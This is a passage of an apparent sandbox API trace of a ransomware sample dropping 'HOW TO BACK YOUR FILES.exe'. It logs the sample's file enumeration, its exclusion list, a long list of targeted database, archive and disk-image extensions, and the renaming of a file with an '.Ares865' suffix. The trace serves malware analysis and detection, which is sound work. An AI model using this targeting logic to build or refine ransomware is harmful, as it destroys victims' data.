"c:\\users\\default user\\local settings\\temporary internet files\\content.ie5\\x9ohk109\\how to back your files.exe"), bFailIfExists=1) returned 0 [0060.455] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x12c [0060.455] GetLastError () returned 0x0 [0060.455] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0060.455] ReadFile (in: hFile=0x12c, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0060.455] CloseHandle (hObject=0x12c) returned 1 [0060.455] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0060.455] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0060.455] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5\\X9OHK109\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a4e2660, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a4e2660, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0060.456] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0060.456] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0060.456] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0060.456] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a4e2660, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a4e2660, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0060.456] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0060.456] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0060.456] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0060.456] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0060.456] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x65f4020, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x65f4020, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x3e5e3095, ftLastWriteTime.dwHighDateTime=0x1cb8930, nFileSizeHigh=0x0, nFileSizeLow=0x43, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0060.456] lstrcmpiW (lpString1="desktop.ini", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0060.456] lstrcmpiW (lpString1="desktop.ini", lpString2="aoldtz.exe") returned 1 [0060.456] lstrcmpiW (lpString1="desktop.ini", lpString2=".") returned 1 [0060.456] lstrcmpiW (lpString1="desktop.ini", lpString2="..") returned 1 [0060.456] lstrcmpiW (lpString1="desktop.ini", lpString2="windows") returned -1 [0060.456] lstrcmpiW (lpString1="desktop.ini", lpString2="bootmgr") returned 1 [0060.456] lstrcmpiW (lpString1="desktop.ini", lpString2="temp") returned -1 [0060.456] lstrcmpiW (lpString1="desktop.ini", lpString2="pagefile.sys") returned -1 [0060.456] lstrcmpiW (lpString1="desktop.ini", lpString2="boot") returned 1 [0060.456] lstrcmpiW (lpString1="desktop.ini", lpString2="ids.txt") returned -1 [0060.456] lstrcmpiW (lpString1="desktop.ini", lpString2="ntuser.dat") returned -1 [0060.456] lstrcmpiW (lpString1="desktop.ini", lpString2="perflogs") returned -1 [0060.456] lstrcmpiW (lpString1="desktop.ini", lpString2="MSBuild") returned -1 [0060.456] lstrlenW (lpString="desktop.ini") returned 11 [0060.456] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5\\X9OHK109\\*") returned 84 [0060.456] lstrcpyW (in: lpString1=0x2cce4a6, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0060.456] lstrlenW (lpString="desktop.ini") returned 11 [0060.456] lstrlenW (lpString="Ares865") returned 7 [0060.456] lstrcmpiW (lpString1="top.ini", lpString2="Ares865") returned 1 [0060.456] lstrlenW (lpString=".dll") returned 4 [0060.456] lstrcmpiW (lpString1="desktop.ini", lpString2=".dll") returned 1 [0060.456] lstrlenW (lpString=".lnk") returned 4 [0060.456] lstrcmpiW (lpString1="desktop.ini", lpString2=".lnk") returned 1 [0060.456] lstrlenW (lpString=".ini") returned 4 [0060.456] lstrcmpiW (lpString1="desktop.ini", lpString2=".ini") returned 1 [0060.456] lstrlenW (lpString=".sys") returned 4 [0060.456] lstrcmpiW (lpString1="desktop.ini", lpString2=".sys") returned 1 [0060.457] lstrlenW (lpString="desktop.ini") returned 11 [0060.457] lstrlenW (lpString="bak") returned 3 [0060.457] lstrcmpiW (lpString1="ini", lpString2="bak") returned 1 [0060.457] lstrlenW (lpString="ba_") returned 3 [0060.457] lstrcmpiW (lpString1="ini", lpString2="ba_") returned 1 [0060.457] lstrlenW (lpString="dbb") returned 3 [0060.457] lstrcmpiW (lpString1="ini", lpString2="dbb") returned 1 [0060.457] lstrlenW (lpString="vmdk") returned 4 [0060.457] lstrcmpiW (lpString1=".ini", lpString2="vmdk") returned -1 [0060.457] lstrlenW (lpString="rar") returned 3 [0060.457] lstrcmpiW (lpString1="ini", lpString2="rar") returned -1 [0060.457] lstrlenW (lpString="zip") returned 3 [0060.457] lstrcmpiW (lpString1="ini", lpString2="zip") returned -1 [0060.457] lstrlenW (lpString="tgz") returned 3 [0060.457] lstrcmpiW (lpString1="ini", lpString2="tgz") returned -1 [0060.457] lstrlenW (lpString="vbox") returned 4 [0060.457] lstrcmpiW (lpString1=".ini", lpString2="vbox") returned -1 [0060.457] lstrlenW (lpString="vdi") returned 3 [0060.457] lstrcmpiW (lpString1="ini", lpString2="vdi") returned -1 [0060.457] lstrlenW (lpString="vhd") returned 3 [0060.457] lstrcmpiW (lpString1="ini", lpString2="vhd") returned -1 [0060.457] lstrlenW (lpString="vhdx") returned 4 [0060.457] lstrcmpiW (lpString1=".ini", lpString2="vhdx") returned -1 [0060.457] lstrlenW (lpString="avhd") returned 4 [0060.457] lstrcmpiW (lpString1=".ini", lpString2="avhd") returned -1 [0060.457] lstrlenW (lpString="db") returned 2 [0060.457] lstrcmpiW (lpString1="ni", lpString2="db") returned 1 [0060.457] lstrlenW (lpString="db2") returned 3 [0060.457] lstrcmpiW (lpString1="ini", lpString2="db2") returned 1 [0060.457] lstrlenW (lpString="db3") returned 3 [0060.457] lstrcmpiW (lpString1="ini", lpString2="db3") returned 1 [0060.457] lstrlenW (lpString="dbf") returned 3 [0060.457] lstrcmpiW (lpString1="ini", lpString2="dbf") returned 1 [0060.457] lstrlenW (lpString="mdf") returned 3 [0060.457] lstrcmpiW (lpString1="ini", lpString2="mdf") returned -1 [0060.457] lstrlenW (lpString="mdb") returned 3 [0060.457] lstrcmpiW (lpString1="ini", lpString2="mdb") returned -1 [0060.457] lstrlenW (lpString="sql") returned 3 [0060.458] lstrcmpiW (lpString1="ini", lpString2="sql") returned -1 [0060.458] lstrlenW (lpString="sqlite") returned 6 [0060.458] lstrcmpiW (lpString1="op.ini", lpString2="sqlite") returned -1 [0060.458] lstrlenW (lpString="sqlite3") returned 7 [0060.458] lstrcmpiW (lpString1="top.ini", lpString2="sqlite3") returned 1 [0060.458] lstrlenW (lpString="sqlitedb") returned 8 [0060.458] lstrcmpiW (lpString1="ktop.ini", lpString2="sqlitedb") returned -1 [0060.458] lstrlenW (lpString="xml") returned 3 [0060.458] lstrcmpiW (lpString1="ini", lpString2="xml") returned -1 [0060.458] lstrlenW (lpString="$er") returned 3 [0060.458] lstrcmpiW (lpString1="ini", lpString2="$er") returned 1 [0060.458] lstrlenW (lpString="4dd") returned 3 [0060.458] lstrcmpiW (lpString1="ini", lpString2="4dd") returned 1 [0060.458] lstrlenW (lpString="4dl") returned 3 [0060.458] lstrcmpiW (lpString1="ini", lpString2="4dl") returned 1 [0060.458] lstrlenW (lpString="^^^") returned 3 [0060.458] lstrcmpiW (lpString1="ini", lpString2="^^^") returned 1 [0060.458] lstrlenW (lpString="abs") returned 3 [0060.458] lstrcmpiW (lpString1="ini", lpString2="abs") returned 1 [0060.458] lstrlenW (lpString="abx") returned 3 [0060.458] lstrcmpiW (lpString1="ini", lpString2="abx") returned 1 [0060.458] lstrlenW (lpString="accdb") returned 5 [0060.458] lstrcmpiW (lpString1="p.ini", lpString2="accdb") returned 1 [0060.458] lstrlenW (lpString="accdc") returned 5 [0060.458] lstrcmpiW (lpString1="p.ini", lpString2="accdc") returned 1 [0060.458] lstrlenW (lpString="accde") returned 5 [0060.458] lstrcmpiW (lpString1="p.ini", lpString2="accde") returned 1 [0060.458] lstrlenW (lpString="accdr") returned 5 [0060.458] lstrcmpiW (lpString1="p.ini", lpString2="accdr") returned 1 [0060.458] lstrlenW (lpString="accdt") returned 5 [0060.458] lstrcmpiW (lpString1="p.ini", lpString2="accdt") returned 1 [0060.458] lstrlenW (lpString="accdw") returned 5 [0060.458] lstrcmpiW (lpString1="p.ini", lpString2="accdw") returned 1 [0060.458] lstrlenW (lpString="accft") returned 5 [0060.458] lstrcmpiW (lpString1="p.ini", lpString2="accft") returned 1 [0060.458] lstrlenW (lpString="adb") returned 3 [0060.459] lstrcmpiW (lpString1="ini", lpString2="adb") returned 1 [0060.459] lstrlenW (lpString="adb") returned 3 [0060.459] lstrcmpiW (lpString1="ini", lpString2="adb") returned 1 [0060.459] lstrlenW (lpString="ade") returned 3 [0060.459] lstrcmpiW (lpString1="ini", lpString2="ade") returned 1 [0060.459] lstrlenW (lpString="adf") returned 3 [0060.459] lstrcmpiW (lpString1="ini", lpString2="adf") returned 1 [0060.459] lstrlenW (lpString="adn") returned 3 [0060.459] lstrcmpiW (lpString1="ini", lpString2="adn") returned 1 [0060.459] lstrlenW (lpString="adp") returned 3 [0060.459] lstrcmpiW (lpString1="ini", lpString2="adp") returned 1 [0060.459] lstrlenW (lpString="alf") returned 3 [0060.459] lstrcmpiW (lpString1="ini", lpString2="alf") returned 1 [0060.459] lstrlenW (lpString="ask") returned 3 [0060.459] lstrcmpiW (lpString1="ini", lpString2="ask") returned 1 [0060.459] lstrlenW (lpString="btr") returned 3 [0060.459] lstrcmpiW (lpString1="ini", lpString2="btr") returned 1 [0060.459] lstrlenW (lpString="cat") returned 3 [0060.459] lstrcmpiW (lpString1="ini", lpString2="cat") returned 1 [0060.459] lstrlenW (lpString="cdb") returned 3 [0060.459] lstrcmpiW (lpString1="ini", lpString2="cdb") returned 1 [0060.459] lstrlenW (lpString="ckp") returned 3 [0060.459] lstrcmpiW (lpString1="ini", lpString2="ckp") returned 1 [0060.459] lstrlenW (lpString="cma") returned 3 [0060.459] lstrcmpiW (lpString1="ini", lpString2="cma") returned 1 [0060.459] lstrlenW (lpString="cpd") returned 3 [0060.459] lstrcmpiW (lpString1="ini", lpString2="cpd") returned 1 [0060.459] lstrlenW (lpString="dacpac") returned 6 [0060.459] lstrcmpiW (lpString1="op.ini", lpString2="dacpac") returned 1 [0060.459] lstrlenW (lpString="dad") returned 3 [0060.459] lstrcmpiW (lpString1="ini", lpString2="dad") returned 1 [0060.459] lstrlenW (lpString="dadiagrams") returned 10 [0060.459] lstrcmpiW (lpString1="esktop.ini", lpString2="dadiagrams") returned 1 [0060.459] lstrlenW (lpString="daschema") returned 8 [0060.459] lstrcmpiW (lpString1="ktop.ini", lpString2="daschema") returned 1 [0060.459] lstrlenW (lpString="db-journal") returned 10 [0060.459] lstrcmpiW (lpString1="esktop.ini", lpString2="db-journal") returned 1 [0060.460] lstrlenW (lpString="db-shm") returned 6 [0060.460] lstrcmpiW (lpString1="op.ini", lpString2="db-shm") returned 1 [0060.460] lstrlenW (lpString="db-wal") returned 6 [0060.460] lstrcmpiW (lpString1="op.ini", lpString2="db-wal") returned 1 [0060.460] lstrlenW (lpString="dbc") returned 3 [0060.460] lstrcmpiW (lpString1="ini", lpString2="dbc") returned 1 [0060.460] lstrlenW (lpString="dbs") returned 3 [0060.460] lstrcmpiW (lpString1="ini", lpString2="dbs") returned 1 [0060.460] lstrlenW (lpString="dbt") returned 3 [0060.460] lstrcmpiW (lpString1="ini", lpString2="dbt") returned 1 [0060.460] lstrlenW (lpString="dbv") returned 3 [0060.460] lstrcmpiW (lpString1="ini", lpString2="dbv") returned 1 [0060.460] lstrlenW (lpString="dbx") returned 3 [0060.460] lstrcmpiW (lpString1="ini", lpString2="dbx") returned 1 [0060.460] lstrlenW (lpString="dcb") returned 3 [0060.460] lstrcmpiW (lpString1="ini", lpString2="dcb") returned 1 [0060.460] lstrlenW (lpString="dct") returned 3 [0060.460] lstrcmpiW (lpString1="ini", lpString2="dct") returned 1 [0060.460] lstrlenW (lpString="dcx") returned 3 [0060.460] lstrcmpiW (lpString1="ini", lpString2="dcx") returned 1 [0060.460] lstrlenW (lpString="ddl") returned 3 [0060.460] lstrcmpiW (lpString1="ini", lpString2="ddl") returned 1 [0060.460] lstrlenW (lpString="dlis") returned 4 [0060.460] lstrcmpiW (lpString1=".ini", lpString2="dlis") returned -1 [0060.460] lstrlenW (lpString="dp1") returned 3 [0060.460] lstrcmpiW (lpString1="ini", lpString2="dp1") returned 1 [0060.460] lstrlenW (lpString="dqy") returned 3 [0060.460] lstrcmpiW (lpString1="ini", lpString2="dqy") returned 1 [0060.460] lstrlenW (lpString="dsk") returned 3 [0060.460] lstrcmpiW (lpString1="ini", lpString2="dsk") returned 1 [0060.461] lstrlenW (lpString="dsn") returned 3 [0060.461] lstrcmpiW (lpString1="ini", lpString2="dsn") returned 1 [0060.461] lstrlenW (lpString="dtsx") returned 4 [0060.461] lstrcmpiW (lpString1=".ini", lpString2="dtsx") returned -1 [0060.461] lstrlenW (lpString="dxl") returned 3 [0060.461] lstrcmpiW (lpString1="ini", lpString2="dxl") returned 1 [0060.461] lstrlenW (lpString="eco") returned 3 [0060.461] lstrcmpiW (lpString1="ini", lpString2="eco") returned 1 [0060.461] lstrlenW (lpString="ecx") returned 3 [0060.461] lstrcmpiW (lpString1="ini", lpString2="ecx") returned 1 [0060.461] lstrlenW (lpString="edb") returned 3 [0060.461] lstrcmpiW (lpString1="ini", lpString2="edb") returned 1 [0060.461] lstrlenW (lpString="epim") returned 4 [0060.461] lstrcmpiW (lpString1=".ini", lpString2="epim") returned -1 [0060.461] lstrlenW (lpString="fcd") returned 3 [0060.461] lstrcmpiW (lpString1="ini", lpString2="fcd") returned 1 [0060.461] lstrlenW (lpString="fdb") returned 3 [0060.461] lstrcmpiW (lpString1="ini", lpString2="fdb") returned 1 [0060.461] lstrlenW (lpString="fic") returned 3 [0060.461] lstrcmpiW (lpString1="ini", lpString2="fic") returned 1 [0060.461] lstrlenW (lpString="flexolibrary") returned 12 [0060.461] lstrlenW (lpString="fm5") returned 3 [0060.461] lstrcmpiW (lpString1="ini", lpString2="fm5") returned 1 [0060.461] lstrlenW (lpString="fmp") returned 3 [0060.461] lstrcmpiW (lpString1="ini", lpString2="fmp") returned 1 [0060.461] lstrlenW (lpString="fmp12") returned 5 [0060.461] lstrcmpiW (lpString1="p.ini", lpString2="fmp12") returned 1 [0060.461] lstrlenW (lpString="fmpsl") returned 5 [0060.461] lstrcmpiW (lpString1="p.ini", lpString2="fmpsl") returned 1 [0060.461] lstrlenW (lpString="fol") returned 3 [0060.461] lstrcmpiW (lpString1="ini", lpString2="fol") returned 1 [0060.461] lstrlenW (lpString="fp3") returned 3 [0060.461] lstrcmpiW (lpString1="ini", lpString2="fp3") returned 1 [0060.461] lstrlenW (lpString="fp4") returned 3 [0060.461] lstrcmpiW (lpString1="ini", lpString2="fp4") returned 1 [0060.461] lstrlenW (lpString="fp5") returned 3 [0060.461] lstrcmpiW (lpString1="ini", lpString2="fp5") returned 1 [0060.461] lstrlenW (lpString="fp7") returned 3 [0060.462] lstrcmpiW (lpString1="ini", lpString2="fp7") returned 1 [0060.462] lstrlenW (lpString="fpt") returned 3 [0060.462] lstrcmpiW (lpString1="ini", lpString2="fpt") returned 1 [0060.462] lstrlenW (lpString="frm") returned 3 [0060.462] lstrcmpiW (lpString1="ini", lpString2="frm") returned 1 [0060.462] lstrlenW (lpString="gdb") returned 3 [0060.462] lstrcmpiW (lpString1="ini", lpString2="gdb") returned 1 [0060.462] lstrlenW (lpString="gdb") returned 3 [0060.462] lstrcmpiW (lpString1="ini", lpString2="gdb") returned 1 [0060.462] lstrlenW (lpString="grdb") returned 4 [0060.462] lstrcmpiW (lpString1=".ini", lpString2="grdb") returned -1 [0060.462] lstrlenW (lpString="gwi") returned 3 [0060.462] lstrcmpiW (lpString1="ini", lpString2="gwi") returned 1 [0060.462] lstrlenW (lpString="hdb") returned 3 [0060.462] lstrcmpiW (lpString1="ini", lpString2="hdb") returned 1 [0060.462] lstrlenW (lpString="his") returned 3 [0060.462] lstrcmpiW (lpString1="ini", lpString2="his") returned 1 [0060.462] lstrlenW (lpString="ib") returned 2 [0060.462] lstrcmpiW (lpString1="ni", lpString2="ib") returned 1 [0060.462] lstrlenW (lpString="idb") returned 3 [0060.462] lstrcmpiW (lpString1="ini", lpString2="idb") returned 1 [0060.462] lstrlenW (lpString="ihx") returned 3 [0060.462] lstrcmpiW (lpString1="ini", lpString2="ihx") returned 1 [0060.462] lstrlenW (lpString="itdb") returned 4 [0060.462] lstrcmpiW (lpString1=".ini", lpString2="itdb") returned -1 [0060.462] lstrlenW (lpString="itw") returned 3 [0060.462] lstrcmpiW (lpString1="ini", lpString2="itw") returned -1 [0060.462] lstrlenW (lpString="jet") returned 3 [0060.462] lstrcmpiW (lpString1="ini", lpString2="jet") returned -1 [0060.462] lstrlenW (lpString="jtx") returned 3 [0060.462] lstrcmpiW (lpString1="ini", lpString2="jtx") returned -1 [0060.462] lstrlenW (lpString="kdb") returned 3 [0060.462] lstrcmpiW (lpString1="ini", lpString2="kdb") returned -1 [0060.462] lstrlenW (lpString="kexi") returned 4 [0060.462] lstrcmpiW (lpString1=".ini", lpString2="kexi") returned -1 [0060.462] lstrlenW (lpString="kexic") returned 5 [0060.462] lstrcmpiW (lpString1="p.ini", lpString2="kexic") returned 1 [0060.463] lstrlenW (lpString="kexis") returned 5 [0060.463] lstrcmpiW (lpString1="p.ini", lpString2="kexis") returned 1 [0060.463] lstrlenW (lpString="lgc") returned 3 [0060.463] lstrcmpiW (lpString1="ini", lpString2="lgc") returned -1 [0060.463] lstrlenW (lpString="lwx") returned 3 [0060.463] lstrcmpiW (lpString1="ini", lpString2="lwx") returned -1 [0060.463] lstrlenW (lpString="maf") returned 3 [0060.463] lstrcmpiW (lpString1="ini", lpString2="maf") returned -1 [0060.463] lstrlenW (lpString="maq") returned 3 [0060.463] lstrcmpiW (lpString1="ini", lpString2="maq") returned -1 [0060.463] lstrlenW (lpString="mar") returned 3 [0060.463] lstrcmpiW (lpString1="ini", lpString2="mar") returned -1 [0060.463] lstrlenW (lpString="marshal") returned 7 [0060.463] lstrcmpiW (lpString1="top.ini", lpString2="marshal") returned 1 [0060.463] lstrlenW (lpString="mas") returned 3 [0060.463] lstrcmpiW (lpString1="ini", lpString2="mas") returned -1 [0060.463] lstrlenW (lpString="mav") returned 3 [0060.463] lstrcmpiW (lpString1="ini", lpString2="mav") returned -1 [0060.463] lstrlenW (lpString="maw") returned 3 [0060.463] lstrcmpiW (lpString1="ini", lpString2="maw") returned -1 [0060.463] lstrlenW (lpString="mdbhtml") returned 7 [0060.463] lstrcmpiW (lpString1="top.ini", lpString2="mdbhtml") returned 1 [0060.463] lstrlenW (lpString="mdn") returned 3 [0060.463] lstrcmpiW (lpString1="ini", lpString2="mdn") returned -1 [0060.463] lstrlenW (lpString="mdt") returned 3 [0060.463] lstrcmpiW (lpString1="ini", lpString2="mdt") returned -1 [0060.463] lstrlenW (lpString="mfd") returned 3 [0060.463] lstrcmpiW (lpString1="ini", lpString2="mfd") returned -1 [0060.463] lstrlenW (lpString="mpd") returned 3 [0060.463] lstrcmpiW (lpString1="ini", lpString2="mpd") returned -1 [0060.463] lstrlenW (lpString="mrg") returned 3 [0060.463] lstrcmpiW (lpString1="ini", lpString2="mrg") returned -1 [0060.463] lstrlenW (lpString="mud") returned 3 [0060.463] lstrcmpiW (lpString1="ini", lpString2="mud") returned -1 [0060.463] lstrlenW (lpString="mwb") returned 3 [0060.463] lstrcmpiW (lpString1="ini", lpString2="mwb") returned -1 [0060.463] lstrlenW (lpString="myd") returned 3 [0060.463] lstrcmpiW (lpString1="ini", lpString2="myd") returned -1 [0060.463] lstrlenW (lpString="ndf") returned 3 [0060.464] lstrcmpiW (lpString1="ini", lpString2="ndf") returned -1 [0060.464] lstrlenW (lpString="nnt") returned 3 [0060.464] lstrcmpiW (lpString1="ini", lpString2="nnt") returned -1 [0060.464] lstrlenW (lpString="nrmlib") returned 6 [0060.464] lstrcmpiW (lpString1="op.ini", lpString2="nrmlib") returned 1 [0060.464] lstrlenW (lpString="ns2") returned 3 [0060.464] lstrcmpiW (lpString1="ini", lpString2="ns2") returned -1 [0060.464] lstrlenW (lpString="ns3") returned 3 [0060.464] lstrcmpiW (lpString1="ini", lpString2="ns3") returned -1 [0060.464] lstrlenW (lpString="ns4") returned 3 [0060.464] lstrcmpiW (lpString1="ini", lpString2="ns4") returned -1 [0060.464] lstrlenW (lpString="nsf") returned 3 [0060.464] lstrcmpiW (lpString1="ini", lpString2="nsf") returned -1 [0060.464] lstrlenW (lpString="nv") returned 2 [0060.464] lstrcmpiW (lpString1="ni", lpString2="nv") returned -1 [0060.464] lstrlenW (lpString="nv2") returned 3 [0060.464] lstrcmpiW (lpString1="ini", lpString2="nv2") returned -1 [0060.464] lstrlenW (lpString="nwdb") returned 4 [0060.464] lstrcmpiW (lpString1=".ini", lpString2="nwdb") returned -1 [0060.464] lstrlenW (lpString="nyf") returned 3 [0060.464] lstrcmpiW (lpString1="ini", lpString2="nyf") returned -1 [0060.464] lstrlenW (lpString="odb") returned 3 [0060.464] lstrcmpiW (lpString1="ini", lpString2="odb") returned -1 [0060.464] lstrlenW (lpString="odb") returned 3 [0060.464] lstrcmpiW (lpString1="ini", lpString2="odb") returned -1 [0060.464] lstrlenW (lpString="oqy") returned 3 [0060.464] lstrcmpiW (lpString1="ini", lpString2="oqy") returned -1 [0060.464] lstrlenW (lpString="ora") returned 3 [0060.464] lstrcmpiW (lpString1="ini", lpString2="ora") returned -1 [0060.464] lstrlenW (lpString="orx") returned 3 [0060.464] lstrcmpiW (lpString1="ini", lpString2="orx") returned -1 [0060.464] lstrlenW (lpString="owc") returned 3 [0060.464] lstrcmpiW (lpString1="ini", lpString2="owc") returned -1 [0060.464] lstrlenW (lpString="p96") returned 3 [0060.464] lstrcmpiW (lpString1="ini", lpString2="p96") returned -1 [0060.464] lstrlenW (lpString="p97") returned 3 [0060.464] lstrcmpiW (lpString1="ini", lpString2="p97") returned -1 [0060.464] lstrlenW (lpString="pan") returned 3 [0060.465] lstrcmpiW (lpString1="ini", lpString2="pan") returned -1 [0060.465] lstrlenW (lpString="pdb") returned 3 [0060.465] lstrcmpiW (lpString1="ini", lpString2="pdb") returned -1 [0060.465] lstrlenW (lpString="pdm") returned 3 [0060.465] lstrcmpiW (lpString1="ini", lpString2="pdm") returned -1 [0060.465] lstrlenW (lpString="pnz") returned 3 [0060.465] lstrcmpiW (lpString1="ini", lpString2="pnz") returned -1 [0060.465] lstrlenW (lpString="qry") returned 3 [0060.465] lstrcmpiW (lpString1="ini", lpString2="qry") returned -1 [0060.465] lstrlenW (lpString="qvd") returned 3 [0060.465] lstrcmpiW (lpString1="ini", lpString2="qvd") returned -1 [0060.465] lstrlenW (lpString="rbf") returned 3 [0060.465] lstrcmpiW (lpString1="ini", lpString2="rbf") returned -1 [0060.465] lstrlenW (lpString="rctd") returned 4 [0060.465] lstrcmpiW (lpString1=".ini", lpString2="rctd") returned -1 [0060.465] lstrlenW (lpString="rod") returned 3 [0060.465] lstrcmpiW (lpString1="ini", lpString2="rod") returned -1 [0060.465] lstrlenW (lpString="rodx") returned 4 [0060.465] lstrcmpiW (lpString1=".ini", lpString2="rodx") returned -1 [0060.465] lstrlenW (lpString="rpd") returned 3 [0060.465] lstrcmpiW (lpString1="ini", lpString2="rpd") returned -1 [0060.465] lstrlenW (lpString="rsd") returned 3 [0060.465] lstrcmpiW (lpString1="ini", lpString2="rsd") returned -1 [0060.465] lstrlenW (lpString="sas7bdat") returned 8 [0060.465] lstrcmpiW (lpString1="ktop.ini", lpString2="sas7bdat") returned -1 [0060.465] lstrlenW (lpString="sbf") returned 3 [0060.465] lstrcmpiW (lpString1="ini", lpString2="sbf") returned -1 [0060.465] lstrlenW (lpString="scx") returned 3 [0060.465] lstrcmpiW (lpString1="ini", lpString2="scx") returned -1 [0060.465] lstrlenW (lpString="sdb") returned 3 [0060.465] lstrcmpiW (lpString1="ini", lpString2="sdb") returned -1 [0060.465] lstrlenW (lpString="sdc") returned 3 [0060.465] lstrcmpiW (lpString1="ini", lpString2="sdc") returned -1 [0060.465] lstrlenW (lpString="sdf") returned 3 [0060.465] lstrcmpiW (lpString1="ini", lpString2="sdf") returned -1 [0060.465] lstrlenW (lpString="sis") returned 3 [0060.465] lstrcmpiW (lpString1="ini", lpString2="sis") returned -1 [0060.465] lstrlenW (lpString="spq") returned 3 [0060.465] lstrcmpiW (lpString1="ini", lpString2="spq") returned -1 [0060.466] lstrlenW (lpString="te") returned 2 [0060.466] lstrcmpiW (lpString1="ni", lpString2="te") returned -1 [0060.466] lstrlenW (lpString="teacher") returned 7 [0060.466] lstrcmpiW (lpString1="top.ini", lpString2="teacher") returned 1 [0060.466] lstrlenW (lpString="tmd") returned 3 [0060.466] lstrcmpiW (lpString1="ini", lpString2="tmd") returned -1 [0060.466] lstrlenW (lpString="tps") returned 3 [0060.466] lstrcmpiW (lpString1="ini", lpString2="tps") returned -1 [0060.466] lstrlenW (lpString="trc") returned 3 [0060.466] lstrcmpiW (lpString1="ini", lpString2="trc") returned -1 [0060.466] lstrlenW (lpString="trc") returned 3 [0060.466] lstrcmpiW (lpString1="ini", lpString2="trc") returned -1 [0060.466] lstrlenW (lpString="trm") returned 3 [0060.466] lstrcmpiW (lpString1="ini", lpString2="trm") returned -1 [0060.466] lstrlenW (lpString="udb") returned 3 [0060.466] lstrcmpiW (lpString1="ini", lpString2="udb") returned -1 [0060.466] lstrlenW (lpString="udl") returned 3 [0060.466] lstrcmpiW (lpString1="ini", lpString2="udl") returned -1 [0060.466] lstrlenW (lpString="usr") returned 3 [0060.466] lstrcmpiW (lpString1="ini", lpString2="usr") returned -1 [0060.466] lstrlenW (lpString="v12") returned 3 [0060.466] lstrcmpiW (lpString1="ini", lpString2="v12") returned -1 [0060.466] lstrlenW (lpString="vis") returned 3 [0060.466] lstrcmpiW (lpString1="ini", lpString2="vis") returned -1 [0060.466] lstrlenW (lpString="vpd") returned 3 [0060.466] lstrcmpiW (lpString1="ini", lpString2="vpd") returned -1 [0060.466] lstrlenW (lpString="vvv") returned 3 [0060.466] lstrcmpiW (lpString1="ini", lpString2="vvv") returned -1 [0060.466] lstrlenW (lpString="wdb") returned 3 [0060.466] lstrcmpiW (lpString1="ini", lpString2="wdb") returned -1 [0060.466] lstrlenW (lpString="wmdb") returned 4 [0060.466] lstrcmpiW (lpString1=".ini", lpString2="wmdb") returned -1 [0060.466] lstrlenW (lpString="wrk") returned 3 [0060.466] lstrcmpiW (lpString1="ini", lpString2="wrk") returned -1 [0060.466] lstrlenW (lpString="xdb") returned 3 [0060.466] lstrcmpiW (lpString1="ini", lpString2="xdb") returned -1 [0060.467] lstrlenW (lpString="xld") returned 3 [0060.467] lstrcmpiW (lpString1="ini", lpString2="xld") returned -1 [0060.467] lstrlenW (lpString="xmlff") returned 5 [0060.467] lstrcmpiW (lpString1="p.ini", lpString2="xmlff") returned -1 [0060.467] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5\\X9OHK109\\desktop.ini.Ares865") returned 102 [0060.467] MoveFileExW (lpExistingFileName="C:\\Users\\Default User\\Local Settings\\Temporary Internet Files\\Content.IE5\\X9OHK109\\desktop.ini" (normalized: "c:\\users\\default user\\local settings\\temporary internet files\\content.ie5\\x9ohk109\\desktop.ini"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Temporary Internet 